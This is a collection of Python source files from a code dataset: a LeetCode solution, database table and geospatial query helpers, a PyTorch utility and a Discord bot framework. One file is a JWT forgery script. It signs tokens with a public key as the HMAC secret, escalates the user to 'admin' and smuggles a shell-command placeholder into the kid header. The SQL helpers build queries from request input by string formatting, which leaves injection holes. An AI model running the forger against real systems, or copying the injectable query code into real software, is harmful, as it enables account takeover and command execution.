for _ in range(n)] for _ in range(m)]\n        dpmin = [[float('inf') for _ in range(n)] for _ in range(m)]\n\n        dpmax[0][0], dpmin[0][0] = grid[0][0], grid[0][0]\n        direct = (-1, 0, -1)\n\n        for i in range(m):\n\n            for j in range(n):\n\n                for k in range(2):\n\n                    x, y = i + direct[k], j + direct[k+1]\n\n                    if x < 0 or y < 0: continue\n\n                    dpmax[i][j] = max(dpmax[i][j], dpmax[x][y] * grid[i][j], dpmin[x][y] * grid[i][j])\n                    dpmin[i][j] = min(dpmin[i][j], dpmax[x][y] * grid[i][j], dpmin[x][y] * grid[i][j])\n\n        maxv = max(dpmax[m-1][n-1], dpmin[m-1][n-1])\n        \n        return -1 if maxv < 0 else (maxv % (10**9 + 7))","sub_path":"PythonLeetcode/leetcodeM/1594_MaximumNonNegativeProductInMatrix.py","file_name":"1594_MaximumNonNegativeProductInMatrix.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"110765247","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/6/1 7:09 PM\n# @Author : czw@rich-f.com\n# @Site : www.rich-f.com\n# @File : datatables.py\n# @Software: Data Exchange Management Platform\n# @Function: dbsrc custom table add-on module\n\n\nclass DataTables:\n\n    \"\"\"Class defining a DataTables object.\n    2018/11/1 update_by cj: the old data assembly re-read all the data on every request, which was very slow;\n    because time was short and the test sample was limited, for now only reads from the mysql database are optimized here.\n\n    :param request: request containing the GET values, specified by the\n    datatable for filtering, sorting and paging\n    :type request: pyramid.request\n    :param query: the query wanted to be seen in the table\n    :type query: sqlalchemy.orm.query.Query\n    :param columns: columns specification for the datatables\n    :type columns: list\n\n    :returns: a DataTables object\n    \"\"\"\n    # initialization\n    def __init__(self, request, db_type, table = None,\n                 sql = None, sqlable = False,\n                 allow_regex_searches=False):\n        \"\"\"Initialize object and run the query.\"\"\"\n        # print(request)\n        self.params = dict(request)\n        if 'sEcho' in self.params:\n            raise ValueError(\n                'Legacy datatables not supported, upgrade to >=1.10')\n        self.table = table\n        self.results = None\n        self.sql = sql\n        self.sqlable = sqlable\n        self.allow_regex_searches = allow_regex_searches\n        self.dt = db_type\n\n        # total in the table after filtering\n        self.cardinality_filtered = 0\n\n        # total in the table unfiltered\n        self.cardinality = 0\n\n        self.filter_cn = []\n        self.error = None\n        if db_type == 'mysql':\n            self.db = __import__('richdataxmysql')\n            self.c = __import__('richdataxmysql.dbstructure.cloumns',fromlist = ('cloumns'))\n        elif db_type == 'sqlserver':\n            self.db = __import__('richdataxsqlserver')\n            self.c = __import__('richdataxsqlserver.dbstructure.cloumns',fromlist=('cloumns'))\n        elif db_type == 'oracle':\n            self.db = __import__('richdataxoracle')\n            self.c = __import__('richdataxoracle.dbstructure.cloumns',fromlist=('cloumns'))\n        try:\n            self.run()\n        except Exception as exc:\n            self.error = str(exc)\n    # assemble the output\n    def output_result(self):\n        \"\"\"Output results in the format needed by DataTables.\"\"\"\n\n        output = {}\n        output['draw'] = str(int(self.params['draw'] if 'draw' in self.params else 0))\n        output['recordsTotal'] = str(self.cardinality)\n        output['recordsFiltered'] = str(self.cardinality_filtered)\n        if self.error:\n            output['error'] = self.error\n            return output\n\n        output['data'] = self.results\n\n        return output\n\n    def run(self):\n        \"\"\"Launch filtering, sorting and paging to output results.\"\"\"\n        if self.sqlable == False:\n            if self.dt == 'mysql': # mysql optimization\n                rows = self.db.query('SELECT * FROM %s LIMIT %s OFFSET %s' %(self.table,self.params.get('length'), self.params.get('start')))\n            else:\n                rows = self.db.select(self.table).execute()\n        else:\n            print(self.sql)\n            rows = self.db.query(self.sql)\n        # print(rows)\n\n        # count\n        if self.sqlable == False:\n            if self.dt == 'mysql': # mysql optimization\n                self.cardinality = self.db.query('SELECT count(1) From %s' %(self.table))[0][0]\n            else:\n                self.cardinality = len(rows)\n        else:\n            self.cardinality = len(rows)\n\n        # search (multi-keyword search not implemented yet)\n        try:\n            if self.params['search[value]']:\n                self.get_columns_name()\n                # print(self.filter_cn)\n                self.where = ''\n                for i in self.filter_cn:\n                    # print(i)\n                    if i != 'id':\n                        self.where += '`'+i + \"` like binary '%\" + self.params['search[value]'] + \"%' or \"\n                self.where = self.where[:-3]\n                # print('SELECT * FROM %s WHERE %s' %(self.table,self.where))\n                rows = self.db.query('SELECT * FROM %s WHERE %s' %(self.table,self.where))\n        except:\n            pass\n\n        # count after filtering\n        if self.params['search[value]']:\n            self.cardinality_filtered = len(rows)\n        else:\n            self.cardinality_filtered = self.cardinality\n\n        # # sorting\n        # query = query.order_by(\n        #     *[e for e in self.sort_expressions if e is not None])\n\n        # # pagination\n        length = int(self.params.get('length'))\n        head = int(self.params.get('start'))\n        if self.sqlable == False:\n            if self.dt == 'mysql': # mysql optimization\n                pass\n            else:\n                rows = rows[head:head + length]\n        else:\n            rows = rows[head:head + length]\n        self.results = rows\n        # print(self.results)\n\n    def get_columns_name(self):\n        try:\n            for i in self.c.Column(self.db,self.table).get_columns():\n                self.filter_cn.append(i['Field'])\n        except:\n            for i in self.c.Column(self.db,self.table).fieldnames:\n                self.filter_cn.append(i)\n        # self.filter_cn = str(tuple(self.filter_cn))\n        return self.filter_cn","sub_path":"richdataxweb/dbsrc/dbsrcTables.py","file_name":"dbsrcTables.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"561557787","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\ngeo.py\n\nCreated by Rodolfo Barriga.\n\"\"\"\n\nimport sys\nimport decimal\nimport geo.util as util\n\nclass Point:\n\tdef __init__(self, x, 
y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef wkt(self):\n\t\treturn 'POINT(%s %s)' %(self.x, self.y)\n\nclass Bbox:\n\tdef __init__(self, point_min, point_max):\n\t\tself.point_min = point_min\n\t\tself.point_max = point_max\n\n\tdef wkt(self):\n\t\ttop_left = '%s %s' %(self.point_min.x, self.point_max.y)\n\t\ttop_right = '%s %s' %(self.point_max.x, self.point_max.y)\n\t\tbottom_left = '%s %s' %(self.point_min.x, self.point_min.y)\n\t\tbottom_right = '%s %s' %(self.point_max.x, self.point_min.y)\n\t\treturn 'POLYGON((%s, %s, %s, %s, %s))' %(bottom_left, bottom_right, top_right, top_left, bottom_left)\n\t\t\nclass Metadata:\n\tdef __init__(self, name, type=''):\n\t\tself.name = name\n\t\tself.type = type\n\t\n\tdef distinct_values(self, layer_name, limit):\n\t\t\n\t\tsql = 'select distinct %s as values ' % self.name \n\t\tsql += 'from %s where %s is not null ' % (layer_name, self.name)\n\t\tsql += 'limit %s' % limit\n\t\t\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tvalues = []\n\t\tfor row in rows:\n\t\t\tv = row['values']\n\t\t\tif isinstance(v, decimal.Decimal): v = float(v)\n\t\t\tvalues.append({'values':v})\n\n\t\tdh.close()\n\t\treturn values\n\t\t\nclass Layer:\n\tdef __init__(self, name, srid=0):\n\t\tself.name = name\n\t\tself.srid = srid\n\n\tdef metadata(self):\n\n\t\tr = self.name.split('.')\n\t\tschema = ''\n\t\tname = ''\n\t\tif (len(r)>1):\n\t\t\tschema = r[0]\n\t\t\tname = r[1]\n\n\t\tsql = 'select column_name, data_type '\n\t\tsql += 'from information_schema.columns '\n\t\tsql += 'where table_schema = \\'%s\\' ' % schema\n\t\tsql += 'and table_name = \\'%s\\' ' % name\n\t\tsql += 'and column_name != \\'%s\\' ' % 'the_geom'\n\t\tsql += 'order by ordinal_position;'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\n\t\tmetadatas = []\n\t\tfor row in rows:\n\t\t\tm = Metadata(row['column_name'], row['data_type'])\n\t\t\tmetadatas.append(m)\n\t\t\t\n\t\tdh.close()\n\t\treturn metadatas\n\t\n\tdef query_count(self, criteria):\n\n\t\tsql = 'select count(*) as count '\n\t\tsql += 'from %s ' % self.name\n\n\t\tif(criteria):\n\t\t\tsql += 'where %s ' % self.__criteria_to_sql(criteria)\n\t\t\n\t\tsql += ';'\n\t\t\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\n\t\tcount = row['count']\n\t\t\n\t\tdh.close()\n\t\treturn count\n\t\n\tdef query(self, fields, criteria, paging=False, start=0, limit=0, order=False, wkt=False):\n\t\t\n\t\t#fields \n\t\tsql = 'select %s ' % fields\n\t\tif(wkt):\n\t\t\tsql += ', astext(transform(the_geom, 96)) as wkt '\n\t\n\t\t#table\n\t\tsql += 'from %s ' % self.name\n\t\n\t\t#options \n\t\tif(criteria):\n\t\t\tsql += 'where %s ' % self.__criteria_to_sql(criteria)\n\t\t\n\t\tif(order):\n\t\t\tsql += ' order by %s ' %(fields)\n\t\t\n\t\tif(paging):\n\t\t\tsql += ' offset %s limit %s ' %(start, limit)\n\t\t\n\t\tsql += ';'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\n\t\tresults = []\n\t\t\n\t\t#building dynamic output dictionary from the fields\n\t\tfor row in rows:\n\t\t\tresult = {}\n\t\t\tfor f in fields.split(','):\n\t\t\t\tv = row[f]\n\t\t\t\tif isinstance(v, decimal.Decimal): v = float(v)\n\t\t\t\tresult[f] = v\n\t\t\tif('wkt' in row):\n\t\t\t\tresult['wkt'] = row['wkt']\n\t\t\t\n\t\t\tresults.append(result)\n\n\t\tdh.close()\n\t\treturn results\n\n\tdef __criteria_to_sql(self, criteria):\n\t\tsql = ''\n\t\tfor c in criteria:\n\t\t\trow_id = c['rowID']\n\t\t\tand_or = c['andOr']\n\t\t\tcolumn_name = c['columnName']\n\t\t\toperator_template = c['operatorTemplate']\n\t\t\tentry_values = 
c['entryValues']\n\t\t\t\n\t\t\tfor i, v in enumerate(entry_values):\n\t\t\t\toperator_template = operator_template.replace('{' + str(i) + '}', str(v))\n\t\t\t\n\t\t\tsql += and_or + ' ' + column_name + ' ' + operator_template + ' '\n\t\t\t\n\t\treturn sql\n\n\tdef bbox(self, to_srid):\n\t\t\n\t\tsql = 'select '\n\t\tsql += 'st_xmin(transform(st_setSRID(r.box, %s), %s)) as xmin, ' % (self.srid, to_srid)\n\t\tsql += 'st_ymin(transform(st_setSRID(r.box, %s), %s)) as ymin, ' % (self.srid, to_srid)\n\t\tsql += 'st_xmax(transform(st_setSRID(r.box, %s), %s)) as xmax, ' % (self.srid, to_srid)\n\t\tsql += 'st_ymax(transform(st_setSRID(r.box, %s), %s)) as ymax ' % (self.srid, to_srid)\n\t\tsql += 'from (select st_extent(the_geom) as box from %s) as r ' % (self.name)\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\t\t\n\t\tbbox = Bbox(Point(row['xmin'], row['ymin']), Point(row['xmax'], row['ymax']))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\n\tdef static_bbox(self):\n\t\t\n\t\tsql = 'select \"left\", bottom, \"right\", top from geometry_columns '\n\t\tsql += 'where f_table_name = \\'%s\\'' % (self.name.split('.')[1])\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\t\t\n\t\tbbox = Bbox(Point(row['left'], row['bottom']), Point(row['right'], row['top']))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\n\tdef closest_point(self, point):\n\t\t\n\t\tgeometry = 'st_geomfromtext( \\'%s\\', %s )' % (point.wkt(), self.srid)\n\n\t\tsql = 'select '\n\t\tsql += 'st_x(the_geom) as x, '\n\t\tsql += 'st_y(the_geom) as y, '\n\t\tsql += 'st_distance( %s, the_geom) as dist ' % geometry\n\t\tsql += 'from %s ' % self.name\n\t\tsql += 'order by dist '\n\t\tsql += 'limit 1'\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\n\t\tp = Point(row['x'], row['y'])\n\n\t\tdh.close()\n\t\treturn p\n\nclass Geometry:\n\tdef __init__(self,id,layer):\n\t\tself.id = id\n\t\tself.layer = layer\n\nclass Group:\n\tdef __init__(self, layers):\n\t\tself.layers = layers\n\t\n\tdef static_bbox(self):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\t\t\t\t\n\t\t\tsql += 'select \"left\", bottom, \"right\", top from geometry_columns '\n\t\t\tsql += 'where f_table_name = \\'%s\\' ' % (layer.name.split('.')[1])\n\t\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tleft = []\n\t\tbottom = []\n\t\tright = []\n\t\ttop = []\n\n\t\tfor row in rows:\n\t\t\tleft.append(row['left'])\n\t\t\tbottom.append(row['bottom'])\n\t\t\tright.append(row['right'])\n\t\t\ttop.append(row['top'])\n\t\t\t\n\t\tbbox = Bbox(Point(min(left), min(bottom)), Point(max(right), max(top)))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\t\n\tdef within_point(self,fields,point,dist):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tgeom = 'st_geomfromtext( \\'%s\\', %s )' % (point.wkt(), '96')\n\t\t\ttransGeom = 'transform(%s,%s)' % (geom, layer.srid)\n\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\n\t\t\tsql += 'select character varying \\'%s\\' as layer_name, ' % layer.name\n\t\t\tsql += 'st_distance( %s, the_geom) as dist, ' % transGeom\n\t\t\tsql += 'gid, '\n\t\t\tsql += '%s ' % fields\n\t\t\tsql += 'from %s where ' % layer.name\n\t\t\tsql += 'st_dwithin(the_geom, %s, %s) ' % (transGeom, dist)\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\t\t\n\t\tgeoms = []\n\t\tfor row in rows:\n\t\t\tg = Geometry(row['gid'], Layer(row['layer_name'], 0))\n\t\t\tgeoms.append(g)\n\t\t\n\t\tdh.close()\n\t\treturn geoms\n\n\tdef within_bbox(self, 
bbox):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tgeom = 'st_geomfromtext( \\'%s\\', %s )' % (bbox.wkt(), '96')\n\t\t\ttransGeom = 'transform(%s,%s)' % (geom, layer.srid)\n\t\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\t\t\t\n\t\t\tsql += '(select character varying \\'%s\\' as layer_name ' % layer.name\n\t\t\tsql += 'from %s where ' % layer.name\n\t\t\tsql += 'st_dwithin(the_geom, %s, %s) ' % (transGeom, 0)\n\t\t\tsql += 'limit 1 )'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tlayers = []\n\t\tfor row in rows:\n\t\t\tl = Layer(row['layer_name'], 0)\n\t\t\tlayers.append(l)\n\t\t\n\t\tdh.close()\n\t\treturn layers\n\n\t#TODO\n\tdef closest_point(self, point):\n\t\t\n\t\tpoints = []\n\t\tfor layer in self.layers:\n\t\t\tp = layer.closest_point(point)\n\t\t\tpoints.append(p)\n\t\t#TODO min by distance\n\t\treturn points","sub_path":"src/server/lib/geo/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486823339","text":"import hmac\nimport hashlib\nimport base64\nimport binascii\n\ndef padding(part):\n if len(part) % 4 != 0:\n padding = 4- (len(part) % 4)\n return part + (\"=\"*padding)\n return part\n\ndef sign(part, key):\n return base64.urlsafe_b64encode(hmac.new(key.encode(), part.encode(), hashlib.sha256).digest()).decode(\"utf-8\").rstrip(\"=\")\n\ndef createJWT(kid, header, body):\n\theader = header.replace(\"0001\", str(kid))\n\tbody = body.replace(\"null\", \"\\\"admin\\\"\")\n\tpayload = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n\tsignature = sign(payload, key)\n\tprint(header)\n\tprint(body)\n\tprint(payload)\n\tprint(signature)\n\treturn base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + signature\n\ndef decode(jwt):\n\tparticles = jwt.split(\".\")\n\theader = base64.b64decode(padding(particles[0])).decode(\"utf-8\")\n\tbody = base64.b64decode(padding(particles[1])).decode(\"utf-8\")\n\treturn header +\".\" + body\n\npublic_key = open('bootstrap.css')\nkey = public_key.read()\norig_jwt = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6IjAwMDEifQ.eyJ1c2VyIjpudWxsfQ.spzCikhspCdf6XAUci3R4EpJOH6gvZcvkDCVrkGbx7Y\"\nparticles = orig_jwt.split(\".\")\nheader = base64.b64decode(padding(particles[0])).decode(\"utf-8\")\nbody = base64.b64decode(padding(particles[1])).decode(\"utf-8\")\n\nresult = createJWT(\"\\|command goes here\", header, body)\nprint(\"---------\")\nprint(result)\nprint(decode(result))\nprint(\"---------\")\n\n\n#for i in range(1,10):\n#\tkid = \"%04d\" % i\n#\tpayload = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n#\tresult = createJWT(kid, header, body)\n#\tprint(\"---------\")\n#\tprint(result)\n#\tprint(decode(result))\n#\tprint(\"---------\")\n\n\n\n\n#header = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\")\n#body = base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n\n#payload = header + \".\" + body\n#print(payload)\n\n#signature = sign(payload, key)\n#print(payload + \".\" + 
signature)\n","sub_path":"jwt4-ruby-vulnerability.py","file_name":"jwt4-ruby-vulnerability.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"160942722","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nTime: 2021-10-18 11:56 上午\n\nAuthor: huayang\n\nSubject:\n\n\"\"\"\nimport os\nfrom argparse import Namespace\nfrom typing import *\nfrom typing import Iterable, Union, Dict\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim as optim, Tensor # noqa\n\nfrom huaytools.python import get_time_string\nfrom huaytools.pytorch.utils import default_device\n\ntry:\n accelerate_available = True\n from accelerate import Accelerator\nexcept: # noqa\n accelerate_available = False\n Accelerator = Any\n\n\nArgsType = Union[Dict, Namespace]\nLossTensor = torch.Tensor\n\n__all__ = [\n 'get_parameters_for_weight_decay',\n 'get_model_save_dir',\n 'default_device',\n 'ArgsType',\n 'LossTensor'\n]\n\n\ndef get_parameters_for_weight_decay(model: nn.Module, learning_rate, weight_decay, no_decay_params: Iterable[str]):\n \"\"\"\"\"\"\n named_parameters = list(model.named_parameters())\n # apply weight_decay\n parameters = [\n {\n 'params': [p for n, p in named_parameters if not any(nd in n for nd in no_decay_params)],\n 'weight_decay': weight_decay,\n 'lr': learning_rate\n },\n {\n 'params': [p for n, p in named_parameters if any(nd in n for nd in no_decay_params)],\n 'weight_decay': 0.0,\n 'lr': learning_rate\n }\n ]\n\n return parameters\n\n\nDEFAULT_SAVE_DIR = os.path.join(os.environ['HOME'], 'out/models')\n\n\ndef get_model_save_dir():\n return os.path.join(DEFAULT_SAVE_DIR, f'model-{get_time_string(fmt=\"%Y%m%d%H%M%S\")}')\n\n","sub_path":"src/huaytools/pytorch/train/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219262463","text":"import logging\nimport asyncio\nimport sys\nimport discord\nfrom pytz import timezone\nimport urllib\nimport time\n\nfrom greenbot.apiwrappers.movienight_api import MovieNightAPI\nfrom greenbot.models.action import ActionParser\nfrom greenbot.models.user import User\nfrom greenbot.models.message import Message\nfrom greenbot.models.module import ModuleManager\nfrom greenbot.models.banphrase import BanphraseManager\nfrom greenbot.managers.sock import SocketManager\nfrom greenbot.managers.schedule import ScheduleManager\nfrom greenbot.managers.db import DBManager\nfrom greenbot.managers.redis import RedisManager\nfrom greenbot.managers.message import MessageManager\nfrom greenbot.managers.handler import HandlerManager\nfrom greenbot.managers.discord_bot import DiscordBotManager\nfrom greenbot.managers.command import CommandManager\nfrom greenbot.managers.twitter import TwitterManager\nfrom greenbot.managers.timeout import TimeoutManager\nfrom greenbot.migration.db import DatabaseMigratable\nfrom greenbot.migration.migrate import Migration\nfrom greenbot.functions import Functions\nfrom greenbot.filters import Filters\nimport greenbot.migration_revisions.db\nimport greenbot.utils as utils\n\nlog = logging.getLogger(__name__)\n\n\ndef custom_exception_handler(loop, context):\n # first, handle with default handler\n if \"exception\" in context:\n if context[\"exception\"] in [AssertionError, SystemExit]:\n return\n\n loop.default_exception_handler(context)\n log.error(context[\"message\"])\n\n\nclass Bot:\n \"\"\"\n Main class for the 
discord bot\n \"\"\"\n\n def __init__(self, config, args):\n self.config = config\n self.args = args\n self.private_loop = asyncio.get_event_loop()\n self.private_loop.set_exception_handler(custom_exception_handler)\n\n self.discord_token = self.config[\"main\"][\"discord_token\"]\n\n ScheduleManager.init(self.private_loop)\n\n DBManager.init(self.config[\"main\"][\"db\"])\n\n ActionParser.bot = self\n\n # redis\n redis_options = {}\n if \"redis\" in config:\n redis_options = dict(config.items(\"redis\"))\n RedisManager.init(**redis_options)\n utils.wait_for_redis_data_loaded(RedisManager.get())\n\n # SQL migrations\n try:\n with DBManager.create_dbapi_connection_scope() as sql_conn:\n sql_migratable = DatabaseMigratable(sql_conn)\n sql_migration = Migration(\n sql_migratable, greenbot.migration_revisions.db, self\n )\n sql_migration.run()\n except ValueError as error:\n log.error(error)\n\n HandlerManager.init_handlers()\n\n self.movienight_api = MovieNightAPI(self, self.config[\"wsc\"], self.config[\"wowza_cdn\"])\n\n HandlerManager.add_handler(\n \"parse_command_from_message\", self.parse_command_from_message\n )\n self.bot_name = self.config[\"main\"][\"bot_name\"]\n self.command_prefix = self.config[\"discord\"][\"command_prefix\"]\n self.settings = {\n \"discord_token\": self.discord_token,\n \"bot_name\": self.bot_name,\n \"command_prefix\": self.command_prefix,\n \"discord_guild_id\": self.config[\"discord\"][\"discord_guild_id\"],\n }\n\n HandlerManager.add_handler(\"discord_ready\", self.wait_discord_load)\n\n self.discord_bot = DiscordBotManager(\n bot=self,\n settings=self.settings,\n redis=RedisManager.get(),\n private_loop=self.private_loop,\n )\n self.twitter_manager = TwitterManager(self)\n self.filters = Filters(self, self.discord_bot)\n self.functions = Functions(self, self.filters)\n\n def psudo_level_member(self, db_session, member):\n user_level = 100\n user = User._create_or_get_by_discord_id(db_session, str(member.id), str(member))\n for role_id in self.roles:\n role = self.filters.get_role([role_id], None, {})[0]\n if not role:\n continue\n if role in member.roles:\n user_level = max(int(user_level), int(self.roles[role_id]))\n return max(user_level, user.level)\n\n @property\n def bot_id(self):\n return self.discord_bot.client.user.id\n\n async def wait_discord_load(self):\n self.roles = {}\n self.socket_manager = SocketManager(self.bot_name, self.execute_now)\n self.message_manager = MessageManager(self)\n self.timeout_manager = TimeoutManager(self)\n self.banphrase_manager = BanphraseManager(self)\n self.module_manager = ModuleManager(self.socket_manager, bot=self).load()\n\n self.commands = CommandManager(\n socket_manager=self.socket_manager,\n module_manager=self.module_manager,\n bot=self,\n ).load()\n await HandlerManager.trigger(\"manager_loaded\")\n\n # promote the admin to level 2000\n owner = self.config[\"main\"].get(\"owner_id\", None)\n if owner is None:\n log.warning(\n \"No admin user specified. See the [main] section in the example config for its usage.\"\n )\n else:\n with DBManager.create_session_scope() as db_session:\n owner = User._create_or_get_by_discord_id(db_session, str(owner))\n if owner is None:\n log.warning(\n \"The login name you entered for the admin user does not exist on twitch. 
\"\n \"No admin user has been created.\"\n )\n else:\n owner.level = 2000\n\n def execute_now(self, function, *args, **kwargs):\n self.execute_delayed(0, function, *args, **kwargs)\n\n def execute_delayed(self, delay, function, *args, **kwargs):\n ScheduleManager.execute_delayed(delay, function, *args, *kwargs)\n\n def execute_every(self, period, function, *args, **kwargs):\n ScheduleManager.execute_every(period, function, *args, **kwargs)\n\n def quit_bot(self):\n try:\n self.module_manager.disable_all()\n self.socket_manager.quit()\n except:\n pass\n \n self.private_loop.call_soon_threadsafe(self.private_loop.stop)\n sys.exit(0)\n\n def connect(self):\n self.discord_bot.connect()\n\n def start(self):\n self.private_loop.run_forever()\n\n async def ban(self, user, timeout_in_seconds=0, delete_message_days=0, reason=None):\n return await self.discord_bot.ban(\n user=user,\n timeout_in_seconds=timeout_in_seconds,\n delete_message_days=delete_message_days,\n reason=reason,\n )\n\n async def unban(self, user_id, reason=None):\n return await self.discord_bot.unban(user_id=user_id, reason=reason)\n\n async def kick(self, user, reason=None):\n return await self.discord_bot.kick(user=user, reason=reason)\n\n async def private_message(\n self, user, message=None, embed=None, file=None, ignore_escape=False\n ):\n if message is None and embed is None and file is None:\n return None\n return await self.discord_bot.private_message(\n user, message, embed, file, ignore_escape\n )\n\n async def say(self, channel, message=None, embed=None, file=None, ignore_escape=False):\n if message is None and embed is None and file is None:\n log.error(\"sent invalid message\")\n return None\n return await self.discord_bot.say(channel, message, embed, file, ignore_escape)\n\n async def parse_command_from_message(\n self, message, content, user_level, author, not_whisper, channel\n ):\n msg_lower = content.lower()\n if msg_lower[:1] == self.settings[\"command_prefix\"]:\n msg_lower_parts = msg_lower.split(\" \")\n trigger = msg_lower_parts[0][1:]\n msg_raw_parts = content.split(\" \")\n if trigger not in self.commands:\n if len(msg_lower_parts) < 1:\n return\n trigger += \" \" + msg_lower_parts[1] if len(msg_lower_parts) > 1 else \"\"\n if trigger not in self.commands:\n return\n msg_raw_parts = (\n msg_raw_parts[1:] if len(msg_raw_parts) > 1 else []\n )\n remaining_message = (\n \" \".join(msg_raw_parts[1:]) if len(msg_raw_parts) > 1 else \"\"\n )\n command = self.commands[trigger]\n extra_args = {\n \"trigger\": trigger,\n \"message_raw\": message,\n \"user_level\": user_level,\n \"whisper\": not not_whisper,\n }\n try:\n await command.run(\n bot=self,\n author=author,\n channel=channel if not_whisper else None,\n message=remaining_message,\n args=extra_args,\n )\n except Exception as e:\n log.error(f\"Error thrown on command {trigger}\")\n log.exception(e)\n\n async def add_role(self, user, role, reason=None):\n return await self.discord_bot.add_role(user, role)\n\n async def remove_role(self, user, role, reason=None):\n return await self.discord_bot.remove_role(user, role, reason)\n\n async def quit(self, bot, author, channel, message, args):\n await self.private_message(user=author, message=\"Quitting the bot!\")\n self.quit_bot()\n\n def apply_filter(self, resp, f):\n available_filters = {\n \"strftime\": _filter_strftime,\n \"timezone\": _filter_timezone,\n \"lower\": lambda var, args: var.lower(),\n \"upper\": lambda var, args: var.upper(),\n \"title\": lambda var, args: var.title(),\n \"capitalize\": lambda 
var, args: var.capitalize(),\n \"swapcase\": lambda var, args: var.swapcase(),\n \"time_since_minutes\": lambda var, args: \"no time\"\n if var == 0\n else utils.time_since(var * 60, 0, time_format=\"long\"),\n \"time_since\": lambda var, args: \"no time\"\n if var == 0\n else utils.time_since(var, 0, time_format=\"long\"),\n \"time_since_dt\": _filter_time_since_dt,\n \"urlencode\": _filter_urlencode,\n \"join\": _filter_join,\n \"number_format\": _filter_number_format,\n \"add\": _filter_add,\n \"or_else\": _filter_or_else,\n }\n if f.name in available_filters:\n return available_filters[f.name](resp, f.arguments)\n return resp\n\n def get_currency(self):\n return {\"name\": \"points\"}\n\n\ndef _filter_time_since_dt(var, args):\n try:\n ts = utils.time_since(utils.now().timestamp(), var.timestamp())\n if ts:\n return ts\n\n return \"0 seconds\"\n except:\n return \"never FeelsBadMan ?\"\n\n\ndef _filter_join(var, args):\n try:\n separator = args[0]\n except IndexError:\n separator = \", \"\n\n return separator.join(var.split(\" \"))\n\n\ndef _filter_number_format(var, args):\n try:\n return f\"{int(var):,d}\"\n except:\n log.exception(\"asdasd\")\n return var\n\n\ndef _filter_strftime(var, args):\n return var.strftime(args[0])\n\n\ndef _filter_timezone(var, args):\n return var.astimezone(timezone(args[0]))\n\n\ndef _filter_urlencode(var, args):\n return urllib.parse.urlencode({\"x\": var})[2:]\n\n\ndef lowercase_first_letter(s):\n return s[:1].lower() + s[1:] if s else \"\"\n\n\ndef _filter_add(var, args):\n try:\n return str(int(var) + int(args[0]))\n except:\n return \"\"\n\n\ndef _filter_or_else(var, args):\n if var is None or len(var) <= 0:\n return args[0]\n else:\n return var\n","sub_path":"greenbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561911839","text":"from django.conf.urls import url\nfrom . 
